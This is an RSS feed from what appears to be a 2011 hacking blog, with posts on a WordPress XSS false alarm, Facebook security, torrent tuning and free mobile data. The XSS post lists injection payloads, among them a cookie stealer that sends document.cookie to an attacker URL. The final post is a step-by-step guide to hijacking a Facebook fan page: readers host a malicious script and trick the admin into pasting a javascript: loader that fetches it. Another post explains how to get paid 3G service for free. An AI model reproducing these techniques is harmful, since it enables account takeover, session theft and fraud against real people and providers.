

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths</title>
	<atom:link href="http://www.hungry-hackers.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Sat, 14 Apr 2012 17:18:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>False Alarm: XSS Vulnerability in WordPress 3.2.1</title>
		<link>http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html#comments</comments>
		<pubDate>Mon, 15 Aug 2011 21:17:11 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Headline]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2053</guid>
		<description><![CDATA[Dear Friends,

My earlier post about the XSS vulnerability turned out to be a False Alarm. Wordpress allows the privileged users to post comments without filtering the HTML tags but for a normal underprivileged user it will filter the tags. I am sorry for the inconvenience. My Intentions were to make all you guys aware of this vulnerability so that you could save your blog from being hacked.

But now I am glad that WordPress is safe. :) <a href="http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2054" title="images" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/images.jpg" alt="" width="225" height="225" />Dear Friends,</p>
<p>My earlier post about the <a title="XSS vulnerability in WordPress 3.2.1" href="http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html" target="_blank">XSS vulnerability in WordPress 3.2.1</a> turned out to be a False Alarm. WordPress allows the privileged users to post comments without filtering the HTML tags but for a normal underprivileged user it will filter the tags. I am sorry for the inconvenience. My Intentions were to make all you guys aware of this vulnerability so that you could save your blog from being hacked.</p>
<p>But now I am glad that WordPress is safe. <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>XSS Injection Vulnerability in WordPress 3.2.1</title>
		<link>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html#comments</comments>
		<pubDate>Mon, 15 Aug 2011 07:19:18 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress Hacks]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Latest]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2039</guid>
		<description><![CDATA[Bad news for just about every WordPress blogger out there. It has been found that the latest version 3.2.1 of WordPress is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution. <a href="http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><strong>Update</strong>: It will work only if you are logged in. Sorry for the false alarm. My intention were to alert the bloggers so that they could safeguard their blogs. For more details <strong><a title="False Alarm" href="http://www.hungry-hackers.com/2011/08/false-alarm-xss-vulnerability-in-wordpress-321.html" target="_blank">Click Here</a></strong></p>
<p><img class="alignleft size-full wp-image-2040" title="wordpress-attack" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/wordpress-attack.jpg" alt="" width="290" height="191" />Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.</p>
<h3>How does it work?</h3>
<p>Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection</p>
<blockquote><p><strong>Popup &#8220;alert&#8221; Box</strong><br />
&lt;script&gt;alert(&#8216;hungry-hackers.com&#8217;)&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Redirect to www.hungry-hackers.com</strong><br />
&lt;script&gt;document.location=&#8221;http://hungry-hackers.com&#8221;&lt;/script&gt;</p></blockquote>
<blockquote><p><strong>Cookie Stealer (need a logging system in place)</strong><br />
&lt;script&gt;document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com&#8221;&lt;/script&gt;</p></blockquote>
<h3>Solution:</h3>
<p>Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/xss-injection-vulnerability-in-wordpress-321.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to Secure your Facebook Account</title>
		<link>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html</link>
		<comments>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html#comments</comments>
		<pubDate>Sat, 13 Aug 2011 09:18:22 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Facebook Hacks]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Account]]></category>
		<category><![CDATA[course]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[rafay]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[videos]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2031</guid>
		<description><![CDATA[In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit. <a href="http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit.</p>
<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Security1.jpg"><img class="size-full wp-image-2033 aligncenter" title="Facebook-Security1" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Security1.jpg" alt="" width="400" height="300" /></a></p>
<p>According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24&#215;7 to make it as secure as possible but the hackers are also working 24&#215;7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.</p>
<p>Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of &#8220;A beginners Guide To Ethical Hacking&#8221;, has the answer to your question with his newly created &#8220;<a title="Facebook Hacking Course" href="https://www.plimus.com/jsp/redirect.jsp?contractId=2920214&amp;referrer=hungryhacker" target="_blank">Facebook Hacking Course</a>&#8220;.</p>
<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Hacking-Course.gif"><img class="size-medium wp-image-2032 aligncenter" title="Facebook Hacking Course" src="http://www.hungry-hackers.com/wp-content/uploads/2011/08/Facebook-Hacking-Course-300x207.gif" alt="" width="449" height="309" /></a></p>
<p>Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.</p>
<p>Now before you make your decision lets hear some words from <strong>Rafay</strong>: <em>&#8220;Friends, if you ask me &#8220;Is Facebook safe?&#8221; my answer would be &#8220;Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.&#8221;</em></p>
<p>Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.</p>
<p><strong>How to get the Facebook Hacking Course?</strong></p>
<p><strong></strong>You can get this Facebook hacking course from <a title="Buy Now" href="https://www.plimus.com/jsp/buynow.jsp?contractId=2920214&amp;referrer=hungryhacker" target="_blank">Here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/08/how-to-secure-your-facebook-account.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Unlimited 3G Service on Tata Docomo</title>
		<link>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html</link>
		<comments>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html#comments</comments>
		<pubDate>Wed, 08 Jun 2011 21:17:21 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[3G Hacks]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[3G]]></category>
		<category><![CDATA[docomo]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[GPRS]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[service]]></category>
		<category><![CDATA[tata]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Unlimited]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2019</guid>
		<description><![CDATA[<p>Hello Friends,</p>

<p>Are you tired of using the low speed 2G service? I know your answer is 'YES'. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.</p> <a href="http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2020" style="margin-top: 10px;" title="3g_logo_4" src="http://www.hungry-hackers.com/wp-content/uploads/2011/06/3g_logo_4.jpg" alt="3G Service" width="210" height="132" />Hello Friends,</p>
<p>Are you tired of using the low speed 2G service? I know your answer is &#8216;YES&#8217;. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.</p>
<p style="page-break-before: always;">
<h3>Requirements</h3>
<ol>
<li>Tata Docomo SIM Card with a balance of more than Rs. 1</li>
<li>3G enabled cellphone</li>
</ol>
<h3>Steps</h3>
<ol>
<li>Create New Access Point Using Below Configuration and restart your cellphone.<br />
<blockquote>
<ul>
<li>Name : Tata Docomo or any</li>
<li>Access Point ( APN ) – tata.docomo.dive.in</li>
<li>Homepage : www.google.com or any</li>
<li>Proxy : 202.87.41.147</li>
<li>Proxy Port : 8080</li>
<li>Username : leave blank</li>
<li>Password : leave blank</li>
</ul>
</blockquote>
</li>
<li>Download <a title="Opera Mini Handler Browser" href="http://www.easy-share.com/1915941325/OperaMini4.2HandlerMod.jar" target="_blank"><em>Operamini 4.2 Handler Browser</em></a></li>
<li>Open your Opera mini handler and do the following changes in the Setiings:<br />
<blockquote>
<ul>
<li>Set <em>Divein Settings</em> as Default Settings For Opera Mini</li>
<li>Set <em>http</em> in Custom Field in your Opera Mini handler</li>
<li>Set Socket Server to <em>http://203.115.112.5.server4.operamini.com</em> OR <em>http://10.124.72.171.server4.operamini.com</em></li>
<li>Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)</li>
</ul>
</blockquote>
</li>
<li>Done!! Now use your free unlimited 3G service. Enjoy!!</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/06/free-unlimited-3g-service-on-tata-docomo.html/feed</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Tips to get Maximum Performance from your P2P Softwares</title>
		<link>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html</link>
		<comments>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html#comments</comments>
		<pubDate>Mon, 30 May 2011 22:18:46 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Movies]]></category>
		<category><![CDATA[Speed]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Torrents]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=2001</guid>
		<description><![CDATA[<p>Hello Friends,</p>
<br />
We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P Softwares. <a href="http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hello Friends,</p>
<p style="text-align: justify;"><img class="alignleft size-full wp-image-2002" title="p2p" src="http://www.hungry-hackers.com/wp-content/uploads/2011/05/p2p.jpg" alt="" width="200" height="200" />We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares  from torrents. While messing with the torrents I found a few things  which turned out to be very fruitful. Today I will show you how to use  those tricks to get maximum performance from your P2P Softwares.</p>
<p style="text-align: justify;"><em><strong>Note: I use uTorrent so all the following Hacks have been tested on the latest version of uTorrent only. </strong><strong>You may test it on other P2P softwares and let us know about your experience</strong></em></p>
<p style="text-align: justify;"><em><strong><span id="more-2001"></span><br />
</strong></em></p>
<h3 style="text-align: justify;">1. Increase Download Speed</h3>
<p style="text-align: justify;">Do the following changes in the preference of uTorrent.</p>
<p style="text-align: justify;"><em><strong>Go to Options&gt;Preferences&gt;Network</strong></em></p>
<div id="e46" style="text-align: justify;">
<ol>
<li>Under ‘Port used for incomming connections’, enter any port number.  It is best to use a port number above 10000. I use 33333.</li>
<li>Randomize port each time utorrent starts: UNCHECKED. I leave this  unchecked because I have a router. If you do not have a router or a  firewall, and want extra security,check this option.</li>
<li>Enable UPnP port mapping (Windows Xp or later only): UNCHECKED. I  leave this unchecked because I have experienced it slowing down speeds.  It is not needed if you manually port forward.</li>
<li>Add utorrent to Windows Firewall exceptions (Windows XP SP2 or  later only): UNCHECKED (do this only if you have windows firewall  disabled)</li>
<li>Global Maximum upload rate (kb/s): [0: unlimited]: 22 (for 256k connection)</li>
<li>Protocol Encryption: ENABLED. I would recommend everyone to enable this. This can help increase speeds with many ISPs.</li>
<li>Allow incoming Legacy Connections: CHECKED</li>
</ol>
<div id="e44"><em><strong>Go to Options&gt;Preferences&gt;Torrents</strong></em></div>
<div>
<ol>
<li>Global Maximum Number of Connections: 130 (for 256k connection)This  number should not be set too low or the number of connections made to  your torrents will be limited. Setting it too high may cause too much  bandwidth to be used and can cause slowdowns.</li>
<li>Maximum Number of connected peers per torrent: 70 (for 256k  connection)If you see that the peers connected to a specific torrent are  exactly this number, or very close, increase this number to improve  speeds.</li>
<li>Number of upload slots per torrent: 3 (for 256k connection)This  depends on how much you want to upload to other users. Do not set too  low or it may affect download speeds.</li>
<li>Use additional upload slots if upload speed &lt;90%: CHECKED</li>
<li>Maximum number of active torrents: 2 (for 256k connection)</li>
<li>Maximum number of active downloads: 1 (for 256k connection)</li>
<li>Enable DHT Network: CHECKEDThis is recommended to be checked to  improve speeds. More people will be available for sharing if this is  checked.</li>
<li>Enable DHT for new torrents: CHECKED</li>
<li>Enable Peer Exchange: CHECKED</li>
<li>Enable scrapping: CHECKED</li>
<li>Pre-allocate all files: CHECKED</li>
<li>Append .!ut to incomplete files: UNCHECKED</li>
</ol>
<div><em><strong>If you have a firewall </strong></em></div>
<div id="e40">
<ol>
<li>Open up the options/preferences/settings for the firewall – usually your firewall will have an icon to click in the taskbar</li>
<li>Look for the keywords “allow list” or “programs”</li>
<li>Add the application you want to give access to the internet</li>
<li>Make sure to save your settings when you are done</li>
</ol>
</div>
<div id="e39"><em><strong>If you have a router</strong></em></div>
<div>
<ol>
<li>Go to start&gt;run&gt;type cmd, press enter&gt;type ipconfig, press enter</li>
<li>Remember both your ip address and your default gateway</li>
<li>Type in your default gateway into your default browser, a password  prompt may come up. The default username and password are admin for my  router</li>
<li>Under ‘Applications’ fill out one line for each p2p client you use</li>
<li>You need to use your ip address, the correct port range and set either tcp or udp</li>
<li>You can find and change the ports in the actual p2p client’s settings, just make sure they are the same in the router</li>
<li>Most p2p apps need both tcp and udp checked, if you are not sure check your p2p client’s FAQ</li>
<li>Save your settings</li>
</ol>
</div>
</div>
</div>
<h3 style="text-align: justify;">2. Block Fake Peers</h3>
<p style="text-align: justify;">Anti-P2P organizations are actively polluting P2P networks with fake  peers, which send out fake or corrupt data in order to waste bandwidth  and slow down file transfers. At its worst, when downloading major  copyrighted torrents, as much as a fourth of the peers you are connected  to can be attributed to various Anti-P2P agencies. There is also a much  more serious side to this. Once you’ve established a connection to one  of these fake “peers”, your IP has been logged and will most likely be  sent to the RIAA/MPAA.</p>
<p style="text-align: justify;">But there is a way to fight back! If you are using the latest uTorrent, you can employ a little known feature called IP filtering. The author of uTorrent has gone out of his way to hide it, but it’s there nonetheless. But before we can activate this filter, we need to retrieve a list of currently known Anti-P2P organization IPs.</p>
<p style="text-align: justify;">This is most easily done by downloading the <a title="Latest Blacklist" href="http://www.easy-share.com/1915785079/µtorrent ipfilter updater.zip" target="_blank">latest blacklist</a> from Bluetack (the same people who wrote SafePeer for the Azureus BT client).</p>
<p style="text-align: justify;">This list is updated daily, and contains all known Anti-P2P organizations, trackers and peers, aswell as all known Goverment/Military IP addresses as collected by the Bluetack team. Once downloaded, extract and rename the file to “ipfilter.dat” in preparation for the final step.</p>
<p style="text-align: justify;">To make the list available to uTorrent, you need to put it in %AppData%\uTorrent\. So type this into the Address Bar, or click Start -&gt; Run and type it there. After placing the ipfilter.dat in this folder, start uTorrent and go into preferences (Ctrl+P), then click on “Advanced”. In the right hand pane, make sure that “ipfilter.enable” is set to true, and then close the dialog. That’s it for the configuration.</p>
<p style="text-align: justify;">You can verify that the list has been loaded by looking under the “Logging” tab of uTorrent, where you should see the line “Loaded ipfilter.dat (X entries)”.</p>
<h3 style="text-align: justify;">3. Hide your IP</h3>
<p style="text-align: justify;">Your IP address is your online identity and could be used by hackers to  break into your computer, steal personal information, or commit other  crimes against you. <a title="Hide My IP" href="http://www.hide-my-ip.com/?id=5684" target="_blank"><em>Hide My IP</em></a> allows you to surf anonymously, change  your IP address, prevent identity theft, and guard against hacker  intrusions. This software can not only be used in case of hiding your IP from other peers but also useful if you want to browse internet anonymously.</p>
<p style="text-align: justify;">
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>6 Tips to Avoid Facebook Viruses and Spam Messages</title>
		<link>http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html</link>
		<comments>http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html#comments</comments>
		<pubDate>Sat, 05 Mar 2011 08:57:16 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Facebook Hacks]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1953</guid>
		<description><![CDATA[Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren't very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place. <a href="http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/03/Facebook.jpg"><img class="size-full wp-image-1955 alignleft" title="Facebook" src="http://www.hungry-hackers.com/wp-content/uploads/2011/03/Facebook.jpg" alt="" width="300" height="240" /></a>Facebook, the biggest social network with 500 million users, provides an  interface to hit an unsuspecting crowd with malware and viruses. These viruses aren&#8217;t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first  place.</p>
<h3 style="text-align: justify;">How to avoid it?</h3>
<p style="text-align: justify;"><strong>1. Think before you Act</strong>. Viruses on Facebook are  sneaky. The hackers and cybercriminals who want your information know  that Facebook users will often click on an interesting post without a  moment&#8217;s thought. If a post sounds a bit over-the-top like a headline  out of a tabloid, this is your first warning sign.</p>
<p style="text-align: justify;"><strong>2. Try to avoid Links and videos with Catchy words like  &#8220;funniest  ever,&#8221; &#8220;most hilarious video on Facebook,&#8221; or &#8220;you&#8217;ve got to see this.&#8221;</strong> Do some keyword research to see if the post in question comes up in a  search engine with information about a current virus or trojan.</p>
<p style="text-align: justify;"><strong>3. Check the poster of the Suspicious content.</strong> If you  receive a message from someone you do not know, this is an obvious red  flag. Facebook video viruses also tend to pop  up in your news feed or on your wall from friends you haven&#8217;t talked to  in a while. Unfortunately, it&#8217;s likely this friend has already fallen  victim to the latest virus on Facebook. After clicking on the story  themselves, the message was sent out to all of their friends as well.</p>
<p style="text-align: justify;"><strong>4 Avoid messages that have been posted by multiple users</strong> as the  virus spreads among your friends who were not so cautious. If a link with title such as &#8220;Sexiest video ever&#8221; shows up all over your feed from all kinds of  people (perhaps friends you would not expect to make such a post), this  is another warning sign. Similar direct messages are a likely variant of  the notorious Facebook Koobface virus which has used this approach in  the past.</p>
<p style="text-align: justify;"><strong>5. Do not fall for the &#8220;typical&#8221; money-transfer schemes.</strong> Chat  messages from friends needing funds will usually sound suspicious.  Everything can&#8217;t be screened before posting, so money transfer scams and  hoax applications still find their way on to Facebook. You should also  avoid applications that claim to do a full &#8220;Error check&#8221; or fix security  problems related to your profile.</p>
<p style="text-align: justify;"><strong>6. Update your anti-virus software frequently.</strong> If you do  accidentally click on a post before realizing it is a hoax, do not click  on any further links or downloads. If it&#8217;s too late and you have  already been infected, the Facebook virus removal process may be  effortless if you have a good anti-virus program to catch the virus,  trojan or other malware early on.</p>
<h3 style="text-align: justify;">What&#8217;s Next?</h3>
<p style="text-align: justify;">These were few important tips to safeguard your facebook account but your job isn&#8217;t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.</p>
<p style="text-align: justify;">If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don&#8217;t fall victim of it.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>How to Hack Facebook Fan Page</title>
		<link>http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html#comments</comments>
		<pubDate>Thu, 24 Feb 2011 04:18:43 +0000</pubDate>
		<dc:creator>Wamiq Ali</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Facebook Hacks]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Internet Hacking]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[fan]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[page]]></category>
		<category><![CDATA[Trick]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1911</guid>
		<description><![CDATA[Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments. <a href="http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/facebook.jpg"><img class="alignleft size-medium wp-image-1912" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/facebook-300x200.jpg" alt="" width="300" height="200" /></a>Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.</p>
<p>Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.</p>
<p><strong>Disclaimer:</strong> Coder and related sites are not responsible for any abuse done using this trick.</p>
<p>1.<strong> </strong>Download the exploit from this<em> <a title="Exploit" href="http://www.easy-share.com/1913947632/HackPages%20At%20facebook.rar" target="_blank">Link</a>. </em></p>
<p>2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from <em><a title="Notepad++" href="http://notepad-plus-plus.org/download" target="_blank">here</a></em>.</p>
<p>3. Open the file named pagehack.js with notepad++. Now find the text <strong><em>wamiqali@hungry-hackers.com</em></strong> by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.</p>
<p>4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text <em><strong>Hey See what i got!</strong> </em>and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js <em>(Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)</em></p>
<p>5. Now you have to upload this script to your server. For this make an account at <strong>0fess.net</strong> or <strong>000webhost.com</strong> (t35 or 110mb won&#8217;t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:</p>
<blockquote><p><em>www.yoursite.0fess.net/booster.js</em></p></blockquote>
<p>6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: <em>Don&#8217;t forget to replace the text in bold with the address of your script</em>) in his <strong>browser&#8217;s address bar</strong> and hit enter while he is on Facebook.</p>
<blockquote><p><em>javascript:(a = (b = document).createElement(&#8220;script&#8221;)).src = &#8220;//<strong>www.yoursite.0fess.net/booster.js</strong>&#8220;, b.body.appendChild(a); void(0)</em></p></blockquote>
<p><strong>Tip:</strong> <em>You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.</em></p>
<p><em></em><strong>About the author:</strong></p>
